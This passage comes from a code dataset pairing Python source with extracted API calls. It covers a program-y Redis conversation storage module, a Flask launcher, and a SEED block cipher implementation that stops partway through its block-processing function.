code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
"""
Copyright (c) 2016-2018 <NAME> http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import redis
from programy.dialog.storage.base import ConversationStorage
from programy.utils.logging.ylogger import YLogger
class RedisStorage(object):
    """Thin wrapper around a StrictRedis connection used for conversation data."""

    def __init__(self, config):
        # db=0 selects the default redis database
        self._redis = redis.StrictRedis(host=config.host,
                                        port=config.port,
                                        password=config.password,
                                        db=0)

    def delete(self, key):
        """Remove *key* from redis."""
        self._redis.delete(key)

    def save(self, h_key, s_key, clientid, properties):
        """Register *clientid* in the sessions set and store its properties hash.

        Both commands are sent through a single pipeline so they execute together.
        """
        pipe = self._redis.pipeline()
        # Add clientid to sessions set
        pipe.sadd(s_key, clientid)
        # Save properties
        pipe.hmset(h_key, properties)
        pipe.execute()

    def is_member(self, s_key, clientid):
        """Return True when *clientid* is present in the sessions set."""
        return self._redis.sismember(s_key, clientid)

    def get(self, h_key):
        """Return the full properties hash stored under *h_key*."""
        return self._redis.hgetall(h_key)

    def remove(self, s_key, clientid):
        """Remove *clientid* from the sessions set."""
        self._redis.srem(s_key, clientid)
class RedisFactory(object):
    """Factory that builds RedisStorage instances from a configuration object."""

    @staticmethod
    def connect(config):
        """Create and return a new RedisStorage bound to *config*."""
        return RedisStorage(config)
class ConversationRedisStorage(ConversationStorage):
    """Persist Conversation properties in redis.

    Layout: every known client id is tracked in the set "<prefix>:sessions",
    and each client's properties live in the hash "<prefix>:<clientid>:props".
    """

    def __init__(self, config, factory=None):
        """
        :param config: storage configuration; must expose a ``prefix``
        :param factory: optional object with a ``connect(config)`` method,
                        allowing a fake redis client to be injected in tests
        """
        ConversationStorage.__init__(self, config)
        if factory is None:
            self._redis = RedisFactory.connect(config)
        else:
            self._redis = factory.connect(config)
        self._prefix = config.prefix
        self._sessions_set_key = "{prefix}:sessions".format( prefix=self._prefix )
        # Make sure the client is able to connect to the redis instance
        #assert self._redis.echo("test"), "Failed to connect to redis instance"

    def empty(self):
        """Delete the sessions set, forgetting every known client id."""
        YLogger.debug(self, "Deleting Conversation redis data")
        try:
            self._redis.delete(self._sessions_set_key)
        except Exception as e:
            YLogger.exception(self, "Failed deleting conversation redis data", e)

    def save_conversation(self, conversation, clientid):
        """Write *conversation*'s properties to redis under *clientid*'s hash."""
        YLogger.debug(self, "Saving conversation to Redis for %s"%clientid)
        h_key = "{prefix}:{clientid}:props".format(
            prefix = self._prefix,
            clientid = clientid )
        try:
            self._redis.save(h_key, self._sessions_set_key, clientid, conversation._properties)
        except Exception as e:
            YLogger.exception(self, "Failed to save conversation to redis for clientid [%s]"%clientid, e)

    def load_conversation(self, conversation, clientid, restore_last_topic=False):
        """Populate *conversation* with the properties saved for *clientid*.

        Does nothing when the client id is not in the sessions set. When
        *restore_last_topic* is True, the saved topic is re-applied after the
        bulk property update.
        """
        YLogger.debug(self, "Loading Conversation from file for %s"%clientid)
        h_key = "{prefix}:{clientid}:props".format(prefix = self._prefix, clientid = clientid)
        try:
            # Check if clientid in sessions set
            if not self._redis.is_member( self._sessions_set_key, clientid ):
                return
            # Fetch properties
            props = self._redis.get(h_key)
            last_topic = props["topic"]
            # Update conversation
            conversation._properties.update(props)
            # Load last topic if required
            if restore_last_topic and last_topic:
                conversation._properties["topic"] = last_topic
        except Exception as e:
            YLogger.exception(self, "Failed to load conversation from redis for clientid [%s]"%clientid, e)

    def remove_conversation(self, clientid):
        """Forget *clientid*'s session membership (its property hash is left in place)."""
        # Bug fix: pass self as the caller context -- every other YLogger call
        # in this class supplies it as the first argument.
        YLogger.debug(self, "Deleting Conversation redis data")
        try:
            self._redis.remove(self._sessions_set_key, clientid)
        except Exception as e:
            YLogger.exception(self, "Failed deleting conversation redis data for clientid [%s]"%clientid, e)
| [
"programy.utils.logging.ylogger.YLogger.exception",
"programy.dialog.storage.base.ConversationStorage.__init__",
"redis.StrictRedis",
"programy.utils.logging.ylogger.YLogger.debug"
] | [((1302, 1392), 'redis.StrictRedis', 'redis.StrictRedis', ([], {'host': 'config.host', 'port': 'config.port', 'password': 'config.password', 'db': '(0)'}), '(host=config.host, port=config.port, password=config.\n password, db=0)\n', (1319, 1392), False, 'import redis\n'), ((2281, 2323), 'programy.dialog.storage.base.ConversationStorage.__init__', 'ConversationStorage.__init__', (['self', 'config'], {}), '(self, config)\n', (2309, 2323), False, 'from programy.dialog.storage.base import ConversationStorage\n'), ((2776, 2831), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', '"""Deleting Conversation redis data"""'], {}), "(self, 'Deleting Conversation redis data')\n", (2789, 2831), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3082, 3151), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', "('Saving conversation to Redis for %s' % clientid)"], {}), "(self, 'Saving conversation to Redis for %s' % clientid)\n", (3095, 3151), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3613, 3684), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['self', "('Loading Conversation from file for %s' % clientid)"], {}), "(self, 'Loading Conversation from file for %s' % clientid)\n", (3626, 3684), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((4494, 4543), 'programy.utils.logging.ylogger.YLogger.debug', 'YLogger.debug', (['"""Deleting Conversation redis data"""'], {}), "('Deleting Conversation redis data')\n", (4507, 4543), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((2945, 3014), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['self', '"""Failed deleting conversation redis data"""', 'e'], {}), "(self, 'Failed deleting conversation redis data', e)\n", (2962, 3014), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((3426, 3526), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', 
(['self', "('Failed to save conversation to redis for clientid [%s]' % clientid)", 'e'], {}), "(self, \n 'Failed to save conversation to redis for clientid [%s]' % clientid, e)\n", (3443, 3526), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((4343, 4445), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['self', "('Failed to load conversation from redis for clientid [%s]' % clientid)", 'e'], {}), "(self, \n 'Failed to load conversation from redis for clientid [%s]' % clientid, e)\n", (4360, 4445), False, 'from programy.utils.logging.ylogger import YLogger\n'), ((4667, 4770), 'programy.utils.logging.ylogger.YLogger.exception', 'YLogger.exception', (['self', "('Failed deleting conversation redis data for clientid [%s]' % clientid)", 'e'], {}), "(self, \n 'Failed deleting conversation redis data for clientid [%s]' % clientid, e)\n", (4684, 4770), False, 'from programy.utils.logging.ylogger import YLogger\n')] |
import os
from users import create_app
# Pick the Flask configuration from the environment; an unset or empty
# FLASK_CONFIG falls back to 'development' (note: `or`, not a getenv default,
# so an empty string also falls back).
config_name = os.getenv('FLASK_CONFIG') or 'development'
app = create_app(config_name)

if __name__ == "__main__":
    app.run()
| [
"os.getenv"
] | [((57, 82), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (66, 82), False, 'import os\n')] |
# coding=utf-8
import logging
import struct
# SEED block cipher extended S-box SS0: 256 precomputed 32-bit entries, one
# per input byte value (used by g() on the lowest byte of its argument).
SS0 = [
    0x2989a1a8, 0x05858184, 0x16c6d2d4, 0x13c3d3d0, 0x14445054, 0x1d0d111c, 0x2c8ca0ac, 0x25052124,
    0x1d4d515c, 0x03434340, 0x18081018, 0x1e0e121c, 0x11415150, 0x3cccf0fc, 0x0acac2c8, 0x23436360,
    0x28082028, 0x04444044, 0x20002020, 0x1d8d919c, 0x20c0e0e0, 0x22c2e2e0, 0x08c8c0c8, 0x17071314,
    0x2585a1a4, 0x0f8f838c, 0x03030300, 0x3b4b7378, 0x3b8bb3b8, 0x13031310, 0x12c2d2d0, 0x2ecee2ec,
    0x30407070, 0x0c8c808c, 0x3f0f333c, 0x2888a0a8, 0x32023230, 0x1dcdd1dc, 0x36c6f2f4, 0x34447074,
    0x2ccce0ec, 0x15859194, 0x0b0b0308, 0x17475354, 0x1c4c505c, 0x1b4b5358, 0x3d8db1bc, 0x01010100,
    0x24042024, 0x1c0c101c, 0x33437370, 0x18889098, 0x10001010, 0x0cccc0cc, 0x32c2f2f0, 0x19c9d1d8,
    0x2c0c202c, 0x27c7e3e4, 0x32427270, 0x03838380, 0x1b8b9398, 0x11c1d1d0, 0x06868284, 0x09c9c1c8,
    0x20406060, 0x10405050, 0x2383a3a0, 0x2bcbe3e8, 0x0d0d010c, 0x3686b2b4, 0x1e8e929c, 0x0f4f434c,
    0x3787b3b4, 0x1a4a5258, 0x06c6c2c4, 0x38487078, 0x2686a2a4, 0x12021210, 0x2f8fa3ac, 0x15c5d1d4,
    0x21416160, 0x03c3c3c0, 0x3484b0b4, 0x01414140, 0x12425250, 0x3d4d717c, 0x0d8d818c, 0x08080008,
    0x1f0f131c, 0x19899198, 0x00000000, 0x19091118, 0x04040004, 0x13435350, 0x37c7f3f4, 0x21c1e1e0,
    0x3dcdf1fc, 0x36467274, 0x2f0f232c, 0x27072324, 0x3080b0b0, 0x0b8b8388, 0x0e0e020c, 0x2b8ba3a8,
    0x2282a2a0, 0x2e4e626c, 0x13839390, 0x0d4d414c, 0x29496168, 0x3c4c707c, 0x09090108, 0x0a0a0208,
    0x3f8fb3bc, 0x2fcfe3ec, 0x33c3f3f0, 0x05c5c1c4, 0x07878384, 0x14041014, 0x3ecef2fc, 0x24446064,
    0x1eced2dc, 0x2e0e222c, 0x0b4b4348, 0x1a0a1218, 0x06060204, 0x21012120, 0x2b4b6368, 0x26466264,
    0x02020200, 0x35c5f1f4, 0x12829290, 0x0a8a8288, 0x0c0c000c, 0x3383b3b0, 0x3e4e727c, 0x10c0d0d0,
    0x3a4a7278, 0x07474344, 0x16869294, 0x25c5e1e4, 0x26062224, 0x00808080, 0x2d8da1ac, 0x1fcfd3dc,
    0x2181a1a0, 0x30003030, 0x37073334, 0x2e8ea2ac, 0x36063234, 0x15051114, 0x22022220, 0x38083038,
    0x34c4f0f4, 0x2787a3a4, 0x05454144, 0x0c4c404c, 0x01818180, 0x29c9e1e8, 0x04848084, 0x17879394,
    0x35053134, 0x0bcbc3c8, 0x0ecec2cc, 0x3c0c303c, 0x31417170, 0x11011110, 0x07c7c3c4, 0x09898188,
    0x35457174, 0x3bcbf3f8, 0x1acad2d8, 0x38c8f0f8, 0x14849094, 0x19495158, 0x02828280, 0x04c4c0c4,
    0x3fcff3fc, 0x09494148, 0x39093138, 0x27476364, 0x00c0c0c0, 0x0fcfc3cc, 0x17c7d3d4, 0x3888b0b8,
    0x0f0f030c, 0x0e8e828c, 0x02424240, 0x23032320, 0x11819190, 0x2c4c606c, 0x1bcbd3d8, 0x2484a0a4,
    0x34043034, 0x31c1f1f0, 0x08484048, 0x02c2c2c0, 0x2f4f636c, 0x3d0d313c, 0x2d0d212c, 0x00404040,
    0x3e8eb2bc, 0x3e0e323c, 0x3c8cb0bc, 0x01c1c1c0, 0x2a8aa2a8, 0x3a8ab2b8, 0x0e4e424c, 0x15455154,
    0x3b0b3338, 0x1cccd0dc, 0x28486068, 0x3f4f737c, 0x1c8c909c, 0x18c8d0d8, 0x0a4a4248, 0x16465254,
    0x37477374, 0x2080a0a0, 0x2dcde1ec, 0x06464244, 0x3585b1b4, 0x2b0b2328, 0x25456164, 0x3acaf2f8,
    0x23c3e3e0, 0x3989b1b8, 0x3181b1b0, 0x1f8f939c, 0x1e4e525c, 0x39c9f1f8, 0x26c6e2e4, 0x3282b2b0,
    0x31013130, 0x2acae2e8, 0x2d4d616c, 0x1f4f535c, 0x24c4e0e4, 0x30c0f0f0, 0x0dcdc1cc, 0x08888088,
    0x16061214, 0x3a0a3238, 0x18485058, 0x14c4d0d4, 0x22426260, 0x29092128, 0x07070304, 0x33033330,
    0x28c8e0e8, 0x1b0b1318, 0x05050104, 0x39497178, 0x10809090, 0x2a4a6268, 0x2a0a2228, 0x1a8a9298
]
# SEED extended S-box SS1 (used by g() on byte 1 of its argument).
SS1 = [
    0x38380830, 0xe828c8e0, 0x2c2d0d21, 0xa42686a2, 0xcc0fcfc3, 0xdc1eced2, 0xb03383b3, 0xb83888b0,
    0xac2f8fa3, 0x60204060, 0x54154551, 0xc407c7c3, 0x44044440, 0x6c2f4f63, 0x682b4b63, 0x581b4b53,
    0xc003c3c3, 0x60224262, 0x30330333, 0xb43585b1, 0x28290921, 0xa02080a0, 0xe022c2e2, 0xa42787a3,
    0xd013c3d3, 0x90118191, 0x10110111, 0x04060602, 0x1c1c0c10, 0xbc3c8cb0, 0x34360632, 0x480b4b43,
    0xec2fcfe3, 0x88088880, 0x6c2c4c60, 0xa82888a0, 0x14170713, 0xc404c4c0, 0x14160612, 0xf434c4f0,
    0xc002c2c2, 0x44054541, 0xe021c1e1, 0xd416c6d2, 0x3c3f0f33, 0x3c3d0d31, 0x8c0e8e82, 0x98188890,
    0x28280820, 0x4c0e4e42, 0xf436c6f2, 0x3c3e0e32, 0xa42585a1, 0xf839c9f1, 0x0c0d0d01, 0xdc1fcfd3,
    0xd818c8d0, 0x282b0b23, 0x64264662, 0x783a4a72, 0x24270723, 0x2c2f0f23, 0xf031c1f1, 0x70324272,
    0x40024242, 0xd414c4d0, 0x40014141, 0xc000c0c0, 0x70334373, 0x64274763, 0xac2c8ca0, 0x880b8b83,
    0xf437c7f3, 0xac2d8da1, 0x80008080, 0x1c1f0f13, 0xc80acac2, 0x2c2c0c20, 0xa82a8aa2, 0x34340430,
    0xd012c2d2, 0x080b0b03, 0xec2ecee2, 0xe829c9e1, 0x5c1d4d51, 0x94148490, 0x18180810, 0xf838c8f0,
    0x54174753, 0xac2e8ea2, 0x08080800, 0xc405c5c1, 0x10130313, 0xcc0dcdc1, 0x84068682, 0xb83989b1,
    0xfc3fcff3, 0x7c3d4d71, 0xc001c1c1, 0x30310131, 0xf435c5f1, 0x880a8a82, 0x682a4a62, 0xb03181b1,
    0xd011c1d1, 0x20200020, 0xd417c7d3, 0x00020202, 0x20220222, 0x04040400, 0x68284860, 0x70314171,
    0x04070703, 0xd81bcbd3, 0x9c1d8d91, 0x98198991, 0x60214161, 0xbc3e8eb2, 0xe426c6e2, 0x58194951,
    0xdc1dcdd1, 0x50114151, 0x90108090, 0xdc1cccd0, 0x981a8a92, 0xa02383a3, 0xa82b8ba3, 0xd010c0d0,
    0x80018181, 0x0c0f0f03, 0x44074743, 0x181a0a12, 0xe023c3e3, 0xec2ccce0, 0x8c0d8d81, 0xbc3f8fb3,
    0x94168692, 0x783b4b73, 0x5c1c4c50, 0xa02282a2, 0xa02181a1, 0x60234363, 0x20230323, 0x4c0d4d41,
    0xc808c8c0, 0x9c1e8e92, 0x9c1c8c90, 0x383a0a32, 0x0c0c0c00, 0x2c2e0e22, 0xb83a8ab2, 0x6c2e4e62,
    0x9c1f8f93, 0x581a4a52, 0xf032c2f2, 0x90128292, 0xf033c3f3, 0x48094941, 0x78384870, 0xcc0cccc0,
    0x14150511, 0xf83bcbf3, 0x70304070, 0x74354571, 0x7c3f4f73, 0x34350531, 0x10100010, 0x00030303,
    0x64244460, 0x6c2d4d61, 0xc406c6c2, 0x74344470, 0xd415c5d1, 0xb43484b0, 0xe82acae2, 0x08090901,
    0x74364672, 0x18190911, 0xfc3ecef2, 0x40004040, 0x10120212, 0xe020c0e0, 0xbc3d8db1, 0x04050501,
    0xf83acaf2, 0x00010101, 0xf030c0f0, 0x282a0a22, 0x5c1e4e52, 0xa82989a1, 0x54164652, 0x40034343,
    0x84058581, 0x14140410, 0x88098981, 0x981b8b93, 0xb03080b0, 0xe425c5e1, 0x48084840, 0x78394971,
    0x94178793, 0xfc3cccf0, 0x1c1e0e12, 0x80028282, 0x20210121, 0x8c0c8c80, 0x181b0b13, 0x5c1f4f53,
    0x74374773, 0x54144450, 0xb03282b2, 0x1c1d0d11, 0x24250521, 0x4c0f4f43, 0x00000000, 0x44064642,
    0xec2dcde1, 0x58184850, 0x50124252, 0xe82bcbe3, 0x7c3e4e72, 0xd81acad2, 0xc809c9c1, 0xfc3dcdf1,
    0x30300030, 0x94158591, 0x64254561, 0x3c3c0c30, 0xb43686b2, 0xe424c4e0, 0xb83b8bb3, 0x7c3c4c70,
    0x0c0e0e02, 0x50104050, 0x38390931, 0x24260622, 0x30320232, 0x84048480, 0x68294961, 0x90138393,
    0x34370733, 0xe427c7e3, 0x24240420, 0xa42484a0, 0xc80bcbc3, 0x50134353, 0x080a0a02, 0x84078783,
    0xd819c9d1, 0x4c0c4c40, 0x80038383, 0x8c0f8f83, 0xcc0ecec2, 0x383b0b33, 0x480a4a42, 0xb43787b3
]
# SEED extended S-box SS2 (used by g() on byte 2 of its argument).
SS2 = [
    0xa1a82989, 0x81840585, 0xd2d416c6, 0xd3d013c3, 0x50541444, 0x111c1d0d, 0xa0ac2c8c, 0x21242505,
    0x515c1d4d, 0x43400343, 0x10181808, 0x121c1e0e, 0x51501141, 0xf0fc3ccc, 0xc2c80aca, 0x63602343,
    0x20282808, 0x40440444, 0x20202000, 0x919c1d8d, 0xe0e020c0, 0xe2e022c2, 0xc0c808c8, 0x13141707,
    0xa1a42585, 0x838c0f8f, 0x03000303, 0x73783b4b, 0xb3b83b8b, 0x13101303, 0xd2d012c2, 0xe2ec2ece,
    0x70703040, 0x808c0c8c, 0x333c3f0f, 0xa0a82888, 0x32303202, 0xd1dc1dcd, 0xf2f436c6, 0x70743444,
    0xe0ec2ccc, 0x91941585, 0x03080b0b, 0x53541747, 0x505c1c4c, 0x53581b4b, 0xb1bc3d8d, 0x01000101,
    0x20242404, 0x101c1c0c, 0x73703343, 0x90981888, 0x10101000, 0xc0cc0ccc, 0xf2f032c2, 0xd1d819c9,
    0x202c2c0c, 0xe3e427c7, 0x72703242, 0x83800383, 0x93981b8b, 0xd1d011c1, 0x82840686, 0xc1c809c9,
    0x60602040, 0x50501040, 0xa3a02383, 0xe3e82bcb, 0x010c0d0d, 0xb2b43686, 0x929c1e8e, 0x434c0f4f,
    0xb3b43787, 0x52581a4a, 0xc2c406c6, 0x70783848, 0xa2a42686, 0x12101202, 0xa3ac2f8f, 0xd1d415c5,
    0x61602141, 0xc3c003c3, 0xb0b43484, 0x41400141, 0x52501242, 0x717c3d4d, 0x818c0d8d, 0x00080808,
    0x131c1f0f, 0x91981989, 0x00000000, 0x11181909, 0x00040404, 0x53501343, 0xf3f437c7, 0xe1e021c1,
    0xf1fc3dcd, 0x72743646, 0x232c2f0f, 0x23242707, 0xb0b03080, 0x83880b8b, 0x020c0e0e, 0xa3a82b8b,
    0xa2a02282, 0x626c2e4e, 0x93901383, 0x414c0d4d, 0x61682949, 0x707c3c4c, 0x01080909, 0x02080a0a,
    0xb3bc3f8f, 0xe3ec2fcf, 0xf3f033c3, 0xc1c405c5, 0x83840787, 0x10141404, 0xf2fc3ece, 0x60642444,
    0xd2dc1ece, 0x222c2e0e, 0x43480b4b, 0x12181a0a, 0x02040606, 0x21202101, 0x63682b4b, 0x62642646,
    0x02000202, 0xf1f435c5, 0x92901282, 0x82880a8a, 0x000c0c0c, 0xb3b03383, 0x727c3e4e, 0xd0d010c0,
    0x72783a4a, 0x43440747, 0x92941686, 0xe1e425c5, 0x22242606, 0x80800080, 0xa1ac2d8d, 0xd3dc1fcf,
    0xa1a02181, 0x30303000, 0x33343707, 0xa2ac2e8e, 0x32343606, 0x11141505, 0x22202202, 0x30383808,
    0xf0f434c4, 0xa3a42787, 0x41440545, 0x404c0c4c, 0x81800181, 0xe1e829c9, 0x80840484, 0x93941787,
    0x31343505, 0xc3c80bcb, 0xc2cc0ece, 0x303c3c0c, 0x71703141, 0x11101101, 0xc3c407c7, 0x81880989,
    0x71743545, 0xf3f83bcb, 0xd2d81aca, 0xf0f838c8, 0x90941484, 0x51581949, 0x82800282, 0xc0c404c4,
    0xf3fc3fcf, 0x41480949, 0x31383909, 0x63642747, 0xc0c000c0, 0xc3cc0fcf, 0xd3d417c7, 0xb0b83888,
    0x030c0f0f, 0x828c0e8e, 0x42400242, 0x23202303, 0x91901181, 0x606c2c4c, 0xd3d81bcb, 0xa0a42484,
    0x30343404, 0xf1f031c1, 0x40480848, 0xc2c002c2, 0x636c2f4f, 0x313c3d0d, 0x212c2d0d, 0x40400040,
    0xb2bc3e8e, 0x323c3e0e, 0xb0bc3c8c, 0xc1c001c1, 0xa2a82a8a, 0xb2b83a8a, 0x424c0e4e, 0x51541545,
    0x33383b0b, 0xd0dc1ccc, 0x60682848, 0x737c3f4f, 0x909c1c8c, 0xd0d818c8, 0x42480a4a, 0x52541646,
    0x73743747, 0xa0a02080, 0xe1ec2dcd, 0x42440646, 0xb1b43585, 0x23282b0b, 0x61642545, 0xf2f83aca,
    0xe3e023c3, 0xb1b83989, 0xb1b03181, 0x939c1f8f, 0x525c1e4e, 0xf1f839c9, 0xe2e426c6, 0xb2b03282,
    0x31303101, 0xe2e82aca, 0x616c2d4d, 0x535c1f4f, 0xe0e424c4, 0xf0f030c0, 0xc1cc0dcd, 0x80880888,
    0x12141606, 0x32383a0a, 0x50581848, 0xd0d414c4, 0x62602242, 0x21282909, 0x03040707, 0x33303303,
    0xe0e828c8, 0x13181b0b, 0x01040505, 0x71783949, 0x90901080, 0x62682a4a, 0x22282a0a, 0x92981a8a
]
# SEED extended S-box SS3 (used by g() on byte 3, the highest byte, of its argument).
SS3 = [
    0x08303838, 0xc8e0e828, 0x0d212c2d, 0x86a2a426, 0xcfc3cc0f, 0xced2dc1e, 0x83b3b033, 0x88b0b838,
    0x8fa3ac2f, 0x40606020, 0x45515415, 0xc7c3c407, 0x44404404, 0x4f636c2f, 0x4b63682b, 0x4b53581b,
    0xc3c3c003, 0x42626022, 0x03333033, 0x85b1b435, 0x09212829, 0x80a0a020, 0xc2e2e022, 0x87a3a427,
    0xc3d3d013, 0x81919011, 0x01111011, 0x06020406, 0x0c101c1c, 0x8cb0bc3c, 0x06323436, 0x4b43480b,
    0xcfe3ec2f, 0x88808808, 0x4c606c2c, 0x88a0a828, 0x07131417, 0xc4c0c404, 0x06121416, 0xc4f0f434,
    0xc2c2c002, 0x45414405, 0xc1e1e021, 0xc6d2d416, 0x0f333c3f, 0x0d313c3d, 0x8e828c0e, 0x88909818,
    0x08202828, 0x4e424c0e, 0xc6f2f436, 0x0e323c3e, 0x85a1a425, 0xc9f1f839, 0x0d010c0d, 0xcfd3dc1f,
    0xc8d0d818, 0x0b23282b, 0x46626426, 0x4a72783a, 0x07232427, 0x0f232c2f, 0xc1f1f031, 0x42727032,
    0x42424002, 0xc4d0d414, 0x41414001, 0xc0c0c000, 0x43737033, 0x47636427, 0x8ca0ac2c, 0x8b83880b,
    0xc7f3f437, 0x8da1ac2d, 0x80808000, 0x0f131c1f, 0xcac2c80a, 0x0c202c2c, 0x8aa2a82a, 0x04303434,
    0xc2d2d012, 0x0b03080b, 0xcee2ec2e, 0xc9e1e829, 0x4d515c1d, 0x84909414, 0x08101818, 0xc8f0f838,
    0x47535417, 0x8ea2ac2e, 0x08000808, 0xc5c1c405, 0x03131013, 0xcdc1cc0d, 0x86828406, 0x89b1b839,
    0xcff3fc3f, 0x4d717c3d, 0xc1c1c001, 0x01313031, 0xc5f1f435, 0x8a82880a, 0x4a62682a, 0x81b1b031,
    0xc1d1d011, 0x00202020, 0xc7d3d417, 0x02020002, 0x02222022, 0x04000404, 0x48606828, 0x41717031,
    0x07030407, 0xcbd3d81b, 0x8d919c1d, 0x89919819, 0x41616021, 0x8eb2bc3e, 0xc6e2e426, 0x49515819,
    0xcdd1dc1d, 0x41515011, 0x80909010, 0xccd0dc1c, 0x8a92981a, 0x83a3a023, 0x8ba3a82b, 0xc0d0d010,
    0x81818001, 0x0f030c0f, 0x47434407, 0x0a12181a, 0xc3e3e023, 0xcce0ec2c, 0x8d818c0d, 0x8fb3bc3f,
    0x86929416, 0x4b73783b, 0x4c505c1c, 0x82a2a022, 0x81a1a021, 0x43636023, 0x03232023, 0x4d414c0d,
    0xc8c0c808, 0x8e929c1e, 0x8c909c1c, 0x0a32383a, 0x0c000c0c, 0x0e222c2e, 0x8ab2b83a, 0x4e626c2e,
    0x8f939c1f, 0x4a52581a, 0xc2f2f032, 0x82929012, 0xc3f3f033, 0x49414809, 0x48707838, 0xccc0cc0c,
    0x05111415, 0xcbf3f83b, 0x40707030, 0x45717435, 0x4f737c3f, 0x05313435, 0x00101010, 0x03030003,
    0x44606424, 0x4d616c2d, 0xc6c2c406, 0x44707434, 0xc5d1d415, 0x84b0b434, 0xcae2e82a, 0x09010809,
    0x46727436, 0x09111819, 0xcef2fc3e, 0x40404000, 0x02121012, 0xc0e0e020, 0x8db1bc3d, 0x05010405,
    0xcaf2f83a, 0x01010001, 0xc0f0f030, 0x0a22282a, 0x4e525c1e, 0x89a1a829, 0x46525416, 0x43434003,
    0x85818405, 0x04101414, 0x89818809, 0x8b93981b, 0x80b0b030, 0xc5e1e425, 0x48404808, 0x49717839,
    0x87939417, 0xccf0fc3c, 0x0e121c1e, 0x82828002, 0x01212021, 0x8c808c0c, 0x0b13181b, 0x4f535c1f,
    0x47737437, 0x44505414, 0x82b2b032, 0x0d111c1d, 0x05212425, 0x4f434c0f, 0x00000000, 0x46424406,
    0xcde1ec2d, 0x48505818, 0x42525012, 0xcbe3e82b, 0x4e727c3e, 0xcad2d81a, 0xc9c1c809, 0xcdf1fc3d,
    0x00303030, 0x85919415, 0x45616425, 0x0c303c3c, 0x86b2b436, 0xc4e0e424, 0x8bb3b83b, 0x4c707c3c,
    0x0e020c0e, 0x40505010, 0x09313839, 0x06222426, 0x02323032, 0x84808404, 0x49616829, 0x83939013,
    0x07333437, 0xc7e3e427, 0x04202424, 0x84a0a424, 0xcbc3c80b, 0x43535013, 0x0a02080a, 0x87838407,
    0xc9d1d819, 0x4c404c0c, 0x83838003, 0x8f838c0f, 0xcec2cc0e, 0x0b33383b, 0x4a42480a, 0x87b3b437
]
# SEED key-schedule constants: KC[i] is the golden-ratio constant 0x9e3779b9
# rotated left by i bits (mod 2**32).
KC = [
    0x9e3779b9, 0x3c6ef373, 0x78dde6e6, 0xf1bbcdcc,
    0xe3779b99, 0xc6ef3733, 0x8dde6e67, 0x1bbcdccf,
    0x3779b99e, 0x6ef3733c, 0xdde6e678, 0xbbcdccf1,
    0x779b99e3, 0xef3733c6, 0xde6e678d, 0xbcdccf1b
]
# SEED operates on 16-byte (128-bit) blocks
BLOCK_SIZE = 16
def long_to_bytes(dest: bytearray, dest_off: int, value: int) -> None:
    """Write *value* as 8 big-endian bytes into *dest* starting at *dest_off*."""
    encoded = struct.pack('>Q', value)
    dest[dest_off:dest_off + 8] = encoded
def g(x: int) -> int:
    """SEED G-function: XOR of the four extended S-box lookups, one per byte of *x*."""
    g_val = SS0[x & 0xff] ^ SS1[(x >> 8) & 0xff] ^ SS2[(x >> 16) & 0xff] ^ SS3[(x >> 24) & 0xff]
    # NOTE(review): '%' maps the value 0xffffffff to 0, unlike the usual
    # '& 0xffffffff' 32-bit mask; presumably intentional to match the paired
    # implementation -- confirm against the reference.
    return g_val % 0xffffffff
def F(ki0: int, ki1: int, r: int) -> int:
    """SEED round function: mix the 64-bit half-block *r* with subkeys ki0/ki1."""
    upper = (r >> 32) % (2 ** 32)
    lower = r % (2 ** 32)
    new_lower = phase_calc2(upper, ki0, lower, ki1)
    new_upper = new_lower + phase_calc1(upper, ki0, lower, ki1)
    # Recombine the two 32-bit halves into a single 64-bit word
    return ((new_upper << 32) | (new_lower & 0xffffffff)) & 0xffffffffffffffff
def phase_calc1(r0: int, ki0: int, r1: int, ki1: int) -> int:
    """First mixing phase of the SEED round function."""
    masked0 = r0 ^ ki0
    masked1 = r1 ^ ki1
    return g(g(masked0 ^ masked1) + masked0) % 0xffffffff
def phase_calc2(r0: int, ki0: int, r1: int, ki1: int) -> int:
    """Second mixing phase, layered on top of phase_calc1."""
    inner = g((r0 ^ ki0) ^ (r1 ^ ki1))
    return g(phase_calc1(r0, ki0, r1, ki1) + inner) % 0xffffffff
def process_block(enc: bool, raw_key: bytes, in_data: bytes) -> bytearray:
    """Encrypt (enc=True) or decrypt (enc=False) one 16-byte block with SEED.

    :param enc: direction flag; decryption walks the round keys in reverse
    :param raw_key: 16-byte key, expanded into round keys via set_key()
    :param in_data: exactly BLOCK_SIZE (16) bytes of input
    :return: 16-byte bytearray with the processed block
    :raises ValueError: if raw_key is None or in_data is not BLOCK_SIZE bytes
    """
    if raw_key is None:
        raise ValueError('raw_key required')
    w_key = set_key(raw_key)
    if len(in_data) != BLOCK_SIZE:
        raise ValueError('wrong size')
    out = bytearray(BLOCK_SIZE)
    # Split the block into the two 64-bit Feistel halves
    left = bytes_to_long(in_data, 0)
